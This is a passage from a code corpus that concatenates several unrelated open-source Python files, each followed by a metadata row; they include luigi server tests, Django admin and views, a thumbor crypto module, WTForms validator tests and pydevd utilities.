luigi.rpc.RemoteScheduler._fetch = _fetch
def tearDown(self):
super(ServerTestBase, self).tearDown()
luigi.rpc.RemoteScheduler._fetch = self._old_fetch
class ServerTest(ServerTestBase):
def test_visualizer(self):
page = self.fetch('/').body
self.assertTrue(page.find(b'<title>') != -1)
def _test_404(self, path):
response = self.fetch(path)
self.assertEqual(response.code, 404)
def test_404(self):
self._test_404('/foo')
def test_api_404(self):
self._test_404('/api/foo')
class ServerTestRun(unittest.TestCase):
"""Test to start and stop the server in a more "standard" way
"""
def run_server(self):
luigi.server.run(api_port=self._api_port, address='127.0.0.1')
def start_server(self):
self._api_port = random.randint(1024, 9999)
self._process = multiprocessing.Process(target=self.run_server)
self._process.start()
time.sleep(0.1) # wait for server to start
self.sch = luigi.rpc.RemoteScheduler(host='localhost', port=self._api_port)
self.sch._wait = lambda: None
def stop_server(self):
self._process.terminate()
self._process.join(1)
if self._process.is_alive():
os.kill(self._process.pid, signal.SIGKILL)
def setUp(self):
state_path = tempfile.mktemp(suffix=self.id())
luigi.configuration.get_config().set('scheduler', 'state_path', state_path)
self.start_server()
def tearDown(self):
self.stop_server()
def test_ping(self):
self.sch.ping(worker='xyz')
def test_raw_ping(self):
self.sch._request('/api/ping', {'worker': 'xyz'})
def test_raw_ping_extended(self):
self.sch._request('/api/ping', {'worker': 'xyz', 'foo': 'bar'})
def test_404(self):
with self.assertRaises(luigi.rpc.RPCError):
self.sch._request('/api/fdsfds', {'dummy': 1})
def test_save_state(self):
self.sch.add_task('X', 'B', deps=('A',))
self.sch.add_task('X', 'A')
self.assertEqual(self.sch.get_work('X')['task_id'], 'A')
self.stop_server()
self.start_server()
work = self.sch.get_work('X')['running_tasks'][0]
self.assertEqual(work['task_id'], 'A')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 4,112,797,289,493,169,000 | 28.765625 | 83 | 0.634908 | false | 3.720703 | true | false | false |
westphahl/verleihsystem | doc/code/server_contact_view.py | 1 | 1178 | def contact_form(request):
if request.method == 'POST':
form = ContactForm(request.POST)
if form.is_valid():
name = form.cleaned_data['name']
mail = form.cleaned_data['mail']
subject = "[Verleihsystem:Kontakt]: "+form.cleaned_data['subject']
message = form.cleaned_data['message']
cc_myself = form.cleaned_data['cc_myself']
recipients = [getattr(settings, 'CONTACT_FORM_EMAIL', '')]
if cc_myself:
recipients.append(mail)
email = EmailMessage(subject=subject, body=message,
to=recipients, headers={'Reply-To': mail})
email.send()
return redirect(reverse('home'))
else:
if request.user.is_anonymous():
form = ContactForm()
else:
name = "%s %s" % (request.user.first_name, request.user.last_name)
mail = request.user.email
form = ContactForm(initial={'name': name, 'mail': mail})
return render_to_response('contact/contact_form.html', {'form': form,},
context_instance=RequestContext(request))
| isc | 8,925,344,169,523,678,000 | 41.071429 | 78 | 0.550934 | false | 4.147887 | false | false | false |
seanbell/opensurfaces | server/common/migrations/0003_auto__add_papercitation.py | 1 | 1955 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'PaperCitation'
db.create_table(u'common_papercitation', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('slug', self.gf('django.db.models.fields.CharField')(unique=True, max_length=128)),
('inline_citation', self.gf('django.db.models.fields.CharField')(max_length=128, blank=True)),
('authors', self.gf('django.db.models.fields.TextField')(blank=True)),
('title', self.gf('django.db.models.fields.TextField')(blank=True)),
('journal', self.gf('django.db.models.fields.TextField')(blank=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'common', ['PaperCitation'])
def backwards(self, orm):
# Deleting model 'PaperCitation'
db.delete_table(u'common_papercitation')
models = {
u'common.papercitation': {
'Meta': {'object_name': 'PaperCitation'},
'authors': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'inline_citation': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'journal': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'title': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
}
}
complete_apps = ['common'] | mit | -8,008,219,321,522,032,000 | 45.571429 | 113 | 0.593862 | false | 3.654206 | false | false | false |
ujdhesa/unisubs | apps/auth/admin.py | 1 | 3332 | # Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
from datetime import datetime
from django import forms
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
from models import CustomUser, Announcement
class CustomUserCreationForm(UserCreationForm):
username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^\w+$',
help_text = _("Required. 30 characters or fewer. Alphanumeric characters only (letters, digits and underscores)."),
error_message = _("This value must contain only letters, numbers and underscores."))
password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
password2 = forms.CharField(label=_("Password confirmation"), widget=forms.PasswordInput)
email = forms.EmailField(label=_('Email'))
class Meta:
model = CustomUser
fields = ("username", "email")
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
list_display = ('username', 'email', 'first_name', 'last_name', 'is_staff',
'is_superuser', 'last_ip', 'partner')
search_fields = ('username', 'first_name', 'last_name', 'email', 'id')
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('username', 'email', 'password1', 'password2')}
),
)
class AnnouncementAdmin(admin.ModelAdmin):
formfield_overrides = {
models.CharField: {'widget': widgets.AdminTextareaWidget}
}
list_display = ('content', 'created', 'visible')
actions = ['make_hidden']
def get_form(self, request, obj=None, **kwargs):
form = super(AnnouncementAdmin, self).get_form(request, obj=None, **kwargs)
default_help_text = form.base_fields['created'].help_text
now = datetime.now()
form.base_fields['created'].help_text = default_help_text+\
u'</br>Current server time is %s. Value is saved without timezone converting.' % now.strftime('%m/%d/%Y %H:%M:%S')
return form
def visible(self, obj):
return not obj.hidden
visible.boolean = True
def make_hidden(self, request, queryset):
Announcement.clear_cache()
queryset.update(hidden=True)
make_hidden.short_description = _(u'Hide')
admin.site.register(Announcement, AnnouncementAdmin)
admin.site.unregister(User)
admin.site.register(CustomUser, CustomUserAdmin)
| agpl-3.0 | 7,780,854,028,149,304,000 | 39.144578 | 126 | 0.697479 | false | 3.95255 | false | false | false |
ivandavid77/learnetic_monitoreo_mcourserpro | apps/learnetic_monitoreo_mcourserpro/priv/utils/extraer_bigquery_events.py | 1 | 2669 | # -*- coding: utf-8 -*-
import sys
import csv
import datetime
from google.cloud import bigquery
if __name__ == '__main__':
client = bigquery.Client()
query = (
'SELECT * '
'FROM `mcourser-mexico-he.events.events2017*` '
'WHERE SUBSTR(username,0,3) IN ("DUR","JAL")'
'AND LENGTH(username) > 9')
query_results = client.run_sync_query(query)
query_results.use_legacy_sql = False
query_results.run()
if query_results.complete:
with open('datos_bigquery.csv', 'wb') as csvfile:
writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
writer.writerow(['random_event_id','created_date','event_type','session_type','user_id',
'username','firstname','lastname','user_role','user_school_id','user_school_name',
'lesson_id','lesson_title','lesson_type','course_id','course_title','course_lessons_count',
'course_ebooks_count','chapter_id','chapter_title','assignment_id','group_assignment_id',
'assignment_grade','assignment_state','assignment_due_date','score','errors_count',
'checks_count','mistake_count','session_duration','request_country_code','request_region',
'request_city','request_citylatlon','user_agent','mlibro_system_version','mlibro_version',
'mlibro_type','mlibro_GUID','mlibro_language','user_email','user_first_name_adult',
'user_last_name_adult','user_email_adult','user_age_type','user_regulation_agreement',
'user_regulation_marketing','user_regulation_information','user_school_national_id',
'user_school_type','user_school_city','user_school_zip_code','user_school_province',
'user_school_country','user_school_email'])
for row in query_results.rows:
result = []
for elem in row:
if type(elem) == unicode:
result.append(elem.encode('utf-8'))
elif type(elem) == datetime.datetime:
result.append(elem.strftime('%Y-%m-%d %H:%M:%S UTC'))
elif type(elem) == int:
result.append(elem)
elif elem == None:
result.append('')
else:
result.append(elem)
writer.writerow(result)
elif query_results.errors:
print(str(query_results.errors))
sys.exit(1)
| bsd-3-clause | 8,337,022,794,136,258,000 | 53.469388 | 120 | 0.529786 | false | 4.118827 | false | false | false |
APSL/libthumbor | tests/thumbor_py3/crypto.py | 2 | 3928 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# thumbor imaging service
# https://github.com/globocom/thumbor/wiki
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com
import base64
import hashlib
import hmac
from Crypto.Cipher import AES
from .url import Url
from six import text_type, PY3, b, PY2
class Cryptor(object):
def __init__(self, security_key):
self.security_key = (security_key * 16)[:16]
def encrypt(self,
width,
height,
smart,
adaptive,
full,
fit_in,
flip_horizontal,
flip_vertical,
halign,
valign,
trim,
crop_left,
crop_top,
crop_right,
crop_bottom,
filters,
image):
generated_url = Url.generate_options(
width=width,
height=height,
smart=smart,
meta=False,
adaptive=adaptive,
full=full,
fit_in=fit_in,
horizontal_flip=flip_horizontal,
vertical_flip=flip_vertical,
halign=halign,
valign=valign,
trim=trim,
crop_left=crop_left,
crop_top=crop_top,
crop_right=crop_right,
crop_bottom=crop_bottom,
filters=filters
)
url = "%s/%s" % (generated_url, hashlib.md5(b(image)).hexdigest())
pad = lambda s: s + (16 - len(s) % 16) * "{"
cipher = AES.new(self.security_key)
if PY2:
url = url.encode('utf-8')
encrypted = base64.urlsafe_b64encode(cipher.encrypt(pad(url)))
return encrypted
def get_options(self, encrypted_url_part, image_url):
try:
opt = self.decrypt(encrypted_url_part)
except ValueError:
opt = None
if not opt and not self.security_key and self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:
security_key = self.storage.get_crypto(image_url)
if security_key is not None:
cr = Cryptor(security_key)
try:
opt = cr.decrypt(encrypted_url_part)
except ValueError:
opt = None
if opt is None:
return None
image_hash = opt and opt.get('image_hash')
image_hash = image_hash[1:] if image_hash and image_hash.startswith('/') else image_hash
path_hash = hashlib.md5(image_url.encode('utf-8')).hexdigest()
if not image_hash or image_hash != path_hash:
return None
opt['image'] = image_url
opt['hash'] = opt['image_hash']
del opt['image_hash']
return opt
def decrypt(self, encrypted):
cipher = AES.new(self.security_key)
try:
debased = base64.urlsafe_b64decode(encrypted.encode("utf-8"))
decrypted = cipher.decrypt(debased)
if PY3:
decrypted = decrypted.decode('ascii')
decrypted = decrypted.rstrip('{')
except TypeError:
return None
result = Url.parse_decrypted('/%s' % decrypted)
result['image_hash'] = result['image']
del result['image']
return result
class Signer:
def __init__(self, security_key):
if isinstance(security_key, text_type):
security_key = security_key.encode('utf-8')
self.security_key = security_key
def validate(self, actual_signature, url):
url_signature = self.signature(url)
return url_signature == actual_signature
def signature(self, url):
return base64.urlsafe_b64encode(hmac.new(self.security_key, text_type(url).encode('utf-8'), hashlib.sha1).digest())
| mit | -3,555,383,855,582,258,700 | 27.258993 | 123 | 0.541752 | false | 3.987817 | false | false | false |
HydrelioxGitHub/home-assistant | homeassistant/components/sensor/demo.py | 8 | 1876 | """
Demo platform that has a couple of fake sensors.
For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
from homeassistant.const import (
ATTR_BATTERY_LEVEL, TEMP_CELSIUS, DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE)
from homeassistant.helpers.entity import Entity
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Demo sensors."""
add_entities([
DemoSensor('Outside Temperature', 15.6, DEVICE_CLASS_TEMPERATURE,
TEMP_CELSIUS, 12),
DemoSensor('Outside Humidity', 54, DEVICE_CLASS_HUMIDITY, '%', None),
])
class DemoSensor(Entity):
"""Representation of a Demo sensor."""
def __init__(self, name, state, device_class,
unit_of_measurement, battery):
"""Initialize the sensor."""
self._name = name
self._state = state
self._device_class = device_class
self._unit_of_measurement = unit_of_measurement
self._battery = battery
@property
def should_poll(self):
"""No polling needed for a demo sensor."""
return False
@property
def device_class(self):
"""Return the device class of the sensor."""
return self._device_class
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the sensor."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit this state is expressed in."""
return self._unit_of_measurement
@property
def device_state_attributes(self):
"""Return the state attributes."""
if self._battery:
return {
ATTR_BATTERY_LEVEL: self._battery,
}
| apache-2.0 | -2,061,182,217,085,773,000 | 27.861538 | 77 | 0.61887 | false | 4.225225 | false | false | false |
CyrilWaechter/pyRevitMEP | pyRevitMEP.tab/Lab.panel/Lab.pulldown/AutoInsulate.pushbutton/script.py | 1 | 3350 | # coding: utf8
import rpw
from rpw import DB, revit
from rpw import logger
__doc__ = "Auto"
__title__ = "Auto Insulate"
__author__ = "Cyril Waechter"
__context__ = "Selection"
# TODO
def apply_size_rule(size, rule):
pass
def set_system_rule(mep_system):
mep_system
return # rule
def get_element_mep_systems(element):
mep_system = []
if isinstance(element, DB.MEPCurve):
mep_system.append(element.MEPsystem)
elif isinstance(element, DB.FamilyInstance):
for connector in element.MEPModel.ConnectorManager.Connectors:
if connector.MEPSystem:
mep_system.append(element.MEPModel.ConnectorManager.Connectors)
else:
logger.info("No system found in element {}".format(element))
return mep_system
def get_nominal_diameter(element):
if isinstance(element, DB.MEPCurve):
return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_DIAMETER_PARAM).AsDouble()
if isinstance(element, DB.FamilyInstance):
return 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
class ConnectorsBreadthFirstSearch:
def __init__(self, element):
self.element = element
self.nominal_diameter = 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
self.queue = [element]
self.visited = []
def outside_diameter_search(self):
if self.queue:
current_element = self.queue.pop(0)
print current_element
if isinstance(current_element, DB.Plumbing.Pipe):
return current_element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
else:
self.visited.append(current_element)
for connector in current_element.MEPModel.ConnectorManager.Connectors:
for ref in connector.AllRefs:
if isinstance(ref.Owner, (DB.FamilyInstance, DB.Plumbing.Pipe)):
if ref.Owner not in self.visited and ref.Radius * 2 >= self.nominal_diameter:
self.queue.append(ref.Owner)
return self.outside_diameter_search()
else:
return self.nominal_diameter
def get_outer_diameter(element):
if isinstance(element, DB.Plumbing.Pipe):
return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
if isinstance(element, DB.FamilyInstance):
for connector in element.MEPModel.ConnectorManager.Connectors:
for sub_con in connector.AllRefs:
logger.debug(sub_con.Owner)
get_outer_diameter(sub_con.Owner)
def get_inner_diameter(element):
if isinstance(element, DB.MEPCurve):
element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_INNER_DIAM_PARAM)
if isinstance(element, DB.FamilyInstance):
max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
# InsulationLiningBase.GetInsulationIds
# for element in rpw.ui.Selection():
# element
# # TODO Determine system rule
# mep_systems = get_element_mep_systems(element)
# if mep_systems:
# rule = set_system_rule(mep_systems[0])
# # TODO Apply size rule
# apply_size_rule(size, rule)
# TODO GUI to set and save configuration
| gpl-3.0 | 5,746,081,570,516,607,000 | 34.638298 | 119 | 0.664776 | false | 3.669222 | false | false | false |
webitup/python3-wforms | tests/validators.py | 1 | 9174 | #!/usr/bin/env python
from unittest import TestCase
from wtforms.validators import StopValidation, ValidationError, email, equal_to, ip_address, length, required, optional, regexp, url, NumberRange, AnyOf, NoneOf, unicode
class DummyTranslations(object):
def gettext(self, string):
return string
def ngettext(self, singular, plural, n):
if n == 1:
return singular
return plural
class DummyForm(dict):
pass
class DummyField(object):
_translations = DummyTranslations()
def __init__(self, data, errors=(), raw_data=None):
self.data = data
self.errors = list(errors)
self.raw_data = raw_data
def gettext(self, string):
return self._translations.gettext(string)
def ngettext(self, singular, plural, n):
return self._translations.ngettext(singular, plural, n)
def grab_error_message(callable, form, field):
try:
callable(form, field)
except ValidationError:
import sys
e = sys.exc_info()[1]
return e.args[0]
class ValidatorsTest(TestCase):
def setUp(self):
self.form = DummyForm()
def test_email(self):
self.assertEqual(email()(self.form, DummyField('foo@bar.dk')), None)
self.assertEqual(email()(self.form, DummyField('123@bar.dk')), None)
self.assertEqual(email()(self.form, DummyField('foo@456.dk')), None)
self.assertEqual(email()(self.form, DummyField('foo@bar456.info')), None)
self.assertRaises(ValidationError, email(), self.form, DummyField(None))
self.assertRaises(ValidationError, email(), self.form, DummyField(''))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo'))
self.assertRaises(ValidationError, email(), self.form, DummyField('bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@'))
self.assertRaises(ValidationError, email(), self.form, DummyField('@bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar.ab12'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@.bar.ab'))
def test_equal_to(self):
self.form['foo'] = DummyField('test')
self.assertEqual(equal_to('foo')(self.form, self.form['foo']), None)
self.assertRaises(ValidationError, equal_to('invalid_field_name'), self.form, DummyField('test'))
self.assertRaises(ValidationError, equal_to('foo'), self.form, DummyField('different_value'))
def test_ip_address(self):
self.assertEqual(ip_address()(self.form, DummyField('127.0.0.1')), None)
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('abc.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('1278.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('127.0.0.abc'))
def test_length(self):
field = DummyField('foobar')
self.assertEqual(length(min=2, max=6)(self.form, field), None)
self.assertRaises(ValidationError, length(min=7), self.form, field)
self.assertEqual(length(min=6)(self.form, field), None)
self.assertRaises(ValidationError, length(max=5), self.form, field)
self.assertEqual(length(max=6)(self.form, field), None)
self.assertRaises(AssertionError, length)
self.assertRaises(AssertionError, length, min=5, max=2)
# Test new formatting features
grab = lambda **k : grab_error_message(length(**k), self.form, field)
self.assertEqual(grab(min=2, max=5, message='%(min)d and %(max)d'), '2 and 5')
self.assert_('at least 8' in grab(min=8))
self.assert_('longer than 5' in grab(max=5))
self.assert_('between 2 and 5' in grab(min=2, max=5))
def test_required(self):
self.assertEqual(required()(self.form, DummyField('foobar')), None)
self.assertRaises(StopValidation, required(), self.form, DummyField(''))
self.assertRaises(StopValidation, required(), self.form, DummyField(' '))
self.assertEqual(required().field_flags, ('required', ))
f = DummyField('', ['Invalid Integer Value'])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, required(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_optional(self):
self.assertEqual(optional()(self.form, DummyField('foobar', raw_data=['foobar'])), None)
self.assertRaises(StopValidation, optional(), self.form, DummyField('', raw_data=['']))
self.assertRaises(StopValidation, optional(), self.form, DummyField(' ', raw_data=[' ']))
self.assertEqual(optional().field_flags, ('optional', ))
f = DummyField('', ['Invalid Integer Value'], raw_data=[''])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, optional(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_regexp(self):
import re
# String regexp
self.assertEqual(regexp('^a')(self.form, DummyField('abcd')), None)
self.assertEqual(regexp('^a', re.I)(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField(None))
# Compiled regexp
self.assertEqual(regexp(re.compile('^a'))(self.form, DummyField('abcd')), None)
self.assertEqual(regexp(re.compile('^a', re.I))(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField(None))
def test_url(self):
self.assertEqual(url()(self.form, DummyField('http://foobar.dk')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.dk/')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.museum/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1:9000/fake')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://localhost/foobar')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://foobar')), None)
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar'))
self.assertRaises(ValidationError, url(), self.form, DummyField('foobar.dk'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://127.0.0/asdf'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.d'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.12'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://localhost:abc/a'))
def test_number_range(self):
v = NumberRange(min=5, max=10)
self.assertEqual(v(self.form, DummyField(7)), None)
self.assertRaises(ValidationError, v, self.form, DummyField(None))
self.assertRaises(ValidationError, v, self.form, DummyField(0))
self.assertRaises(ValidationError, v, self.form, DummyField(12))
onlymin = NumberRange(min=5)
self.assertEqual(onlymin(self.form, DummyField(500)), None)
self.assertRaises(ValidationError, onlymin, self.form, DummyField(4))
onlymax = NumberRange(max=50)
self.assertEqual(onlymax(self.form, DummyField(30)), None)
self.assertRaises(ValidationError, onlymax, self.form, DummyField(75))
def test_lazy_proxy(self):
"""Tests that the validators support lazy translation strings for messages."""
class ReallyLazyProxy(object):
def __unicode__(self):
raise Exception('Translator function called during form declaration: it should be called at response time.')
__str__ = __unicode__
message = ReallyLazyProxy()
self.assertRaises(Exception, str, message)
self.assertRaises(Exception, unicode, message)
self.assert_(equal_to('fieldname', message=message))
self.assert_(length(min=1, message=message))
self.assert_(NumberRange(1,5, message=message))
self.assert_(required(message=message))
self.assert_(regexp('.+', message=message))
self.assert_(email(message=message))
self.assert_(ip_address(message=message))
self.assert_(url(message=message))
def test_any_of(self):
self.assertEqual(AnyOf(['a', 'b', 'c'])(self.form, DummyField('b')), None)
self.assertRaises(ValueError, AnyOf(['a', 'b', 'c']), self.form, DummyField(None))
def test_none_of(self):
self.assertEqual(NoneOf(['a', 'b', 'c'])(self.form, DummyField('d')), None)
self.assertRaises(ValueError, NoneOf(['a', 'b', 'c']), self.form, DummyField('a'))
if __name__ == '__main__':
from unittest import main
main()
| bsd-3-clause | -3,406,957,340,670,500,400 | 49.685083 | 169 | 0.653913 | false | 3.849769 | true | false | false |
Rayvenden/scripts | watcher.py | 1 | 1673 | #!/usr/bin/python3
import argparse
import os
import subprocess
import time
import signal
# Avoid zombie process
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
# Exit after receiving Control-C
signal.signal(signal.SIGINT, signal.SIG_DFL)
parser = argparse.ArgumentParser(prog='watcher.py',
description='Simple filesystem watcher')
parser.add_argument('-l', '--files-list',
help='document with list of files to observe')
parser.add_argument('-f', '--files', nargs='*',
help='files to observe')
parser.add_argument('-c', '--command',
help='command to execute')
parser.add_argument('-n', '--no-shell', action='store_false',
help='do not use shell while evaluating command')
args = parser.parse_args()
if args.files_list != None:
files = [line.rstrip('\n') for line in open(args.files_list)]
elif args.files:
files = args.files
else:
files = os.listdir()
# get initial modification time for files
for k, v in enumerate(files):
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(v)
files[k] = [v, mtime]
args.command = '' if not args.command else args.command
process = subprocess.Popen(args.command, shell=args.no_shell)
# watch & restart loop
while 1:
reloaded = False
for k, v in enumerate(files):
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(v[0])
if mtime != v[1] and not reloaded:
try:
process.wait(1)
except:
process.send_signal(1)
process = subprocess.Popen(args.command, shell=args.no_shell)
reloaded = True
files[k][1] = mtime
time.sleep(1)
| bsd-3-clause | 8,947,274,092,214,116,000 | 29.981481 | 84 | 0.644351 | false | 3.428279 | false | false | false |
ArcherSys/ArcherSys | eclipse/plugins/org.python.pydev_4.5.5.201603221110/pysrc/_pydevd_bundle/pydevd_utils.py | 1 | 5587 | from __future__ import nested_scopes
import traceback
import os
try:
from urllib import quote
except:
from urllib.parse import quote # @UnresolvedImport
from _pydevd_bundle import pydevd_constants
import sys
from _pydev_bundle import pydev_log
def save_main_module(file, module_name):
# patch provided by: Scott Schlesier - when script is run, it does not
# use globals from pydevd:
# This will prevent the pydevd script from contaminating the namespace for the script to be debugged
# pretend pydevd is not the main module, and
# convince the file to be debugged that it was loaded as main
sys.modules[module_name] = sys.modules['__main__']
sys.modules[module_name].__name__ = module_name
from imp import new_module
m = new_module('__main__')
sys.modules['__main__'] = m
if hasattr(sys.modules[module_name], '__loader__'):
setattr(m, '__loader__', getattr(sys.modules[module_name], '__loader__'))
m.__file__ = file
return m
def to_number(x):
if is_string(x):
try:
n = float(x)
return n
except ValueError:
pass
l = x.find('(')
if l != -1:
y = x[0:l-1]
#print y
try:
n = float(y)
return n
except ValueError:
pass
return None
def compare_object_attrs(x, y):
try:
if x == y:
return 0
x_num = to_number(x)
y_num = to_number(y)
if x_num is not None and y_num is not None:
if x_num - y_num<0:
return -1
else:
return 1
if '__len__' == x:
return -1
if '__len__' == y:
return 1
return x.__cmp__(y)
except:
if pydevd_constants.IS_PY3K:
return (to_string(x) > to_string(y)) - (to_string(x) < to_string(y))
else:
return cmp(to_string(x), to_string(y))
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
if pydevd_constants.IS_PY3K:
def is_string(x):
return isinstance(x, str)
else:
def is_string(x):
return isinstance(x, basestring)
def to_string(x):
if is_string(x):
return x
else:
return str(x)
def print_exc():
if traceback:
traceback.print_exc()
if pydevd_constants.IS_PY3K:
def quote_smart(s, safe='/'):
return quote(s, safe)
else:
def quote_smart(s, safe='/'):
if isinstance(s, unicode):
s = s.encode('utf-8')
return quote(s, safe)
def _get_project_roots(project_roots_cache=[]):
# Note: the project_roots_cache is the same instance among the many calls to the method
if not project_roots_cache:
roots = os.getenv('IDE_PROJECT_ROOTS', '').split(os.pathsep)
pydev_log.debug("IDE_PROJECT_ROOTS %s\n" % roots)
new_roots = []
for root in roots:
new_roots.append(os.path.normcase(root))
project_roots_cache.append(new_roots)
return project_roots_cache[-1] # returns the project roots with case normalized
def not_in_project_roots(filename, filename_to_not_in_scope_cache={}):
# Note: the filename_to_not_in_scope_cache is the same instance among the many calls to the method
try:
return filename_to_not_in_scope_cache[filename]
except:
project_roots = _get_project_roots()
filename = os.path.normcase(filename)
for root in project_roots:
if filename.startswith(root):
filename_to_not_in_scope_cache[filename] = False
break
else: # for else (only called if the break wasn't reached).
filename_to_not_in_scope_cache[filename] = True
# at this point it must be loaded.
return filename_to_not_in_scope_cache[filename]
def is_filter_enabled():
return os.getenv('PYDEVD_FILTERS') is not None
def is_filter_libraries():
return os.getenv('PYDEVD_FILTER_LIBRARIES') is not None
def _get_stepping_filters(filters_cache=[]):
if not filters_cache:
filters = os.getenv('PYDEVD_FILTERS', '').split(';')
new_filters = []
for new_filter in filters:
new_filters.append(new_filter)
filters_cache.append(new_filters)
return filters_cache[-1]
def is_ignored_by_filter(filename, filename_to_ignored_by_filters_cache={}):
try:
return filename_to_ignored_by_filters_cache[filename]
except:
import fnmatch
for stepping_filter in _get_stepping_filters():
if fnmatch.fnmatch(filename, stepping_filter):
pydev_log.debug("File %s ignored by filter %s" % (filename, stepping_filter))
filename_to_ignored_by_filters_cache[filename] = True
break
else:
filename_to_ignored_by_filters_cache[filename] = False
return filename_to_ignored_by_filters_cache[filename]
| mit | -831,696,770,111,931,300 | 29.2 | 104 | 0.581171 | false | 3.649249 | false | false | false |
ric2b/Vivaldi-browser | chromium/third_party/polymer/v1_0/create_components_summary.py | 10 | 1643 | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import re
COMPONENTS_DIR = 'components'
DESTINATION_COMPONENTS_DIR = 'components-chromium'
COMPONENT_SUMMARY =\
"""Name: %(name)s
Repository: %(repository)s
Tree: %(tree)s
Revision: %(revision)s
Tree link: %(tree_link)s
"""
def PrintSummary(info):
repository = info['_source']
resolution = info['_resolution']
tree = GetTreeishName(resolution)
# Convert to web link.
repository_web = re.sub('^git:', 'https:', re.sub('\.git$', '', repository))
# Specify tree to browse to.
tree_link = repository_web + '/tree/' + tree
print COMPONENT_SUMMARY % {
'name': info['name'],
'repository': repository,
'tree': tree,
'revision': resolution['commit'],
'tree_link': tree_link
}
def GetTreeishName(resolution):
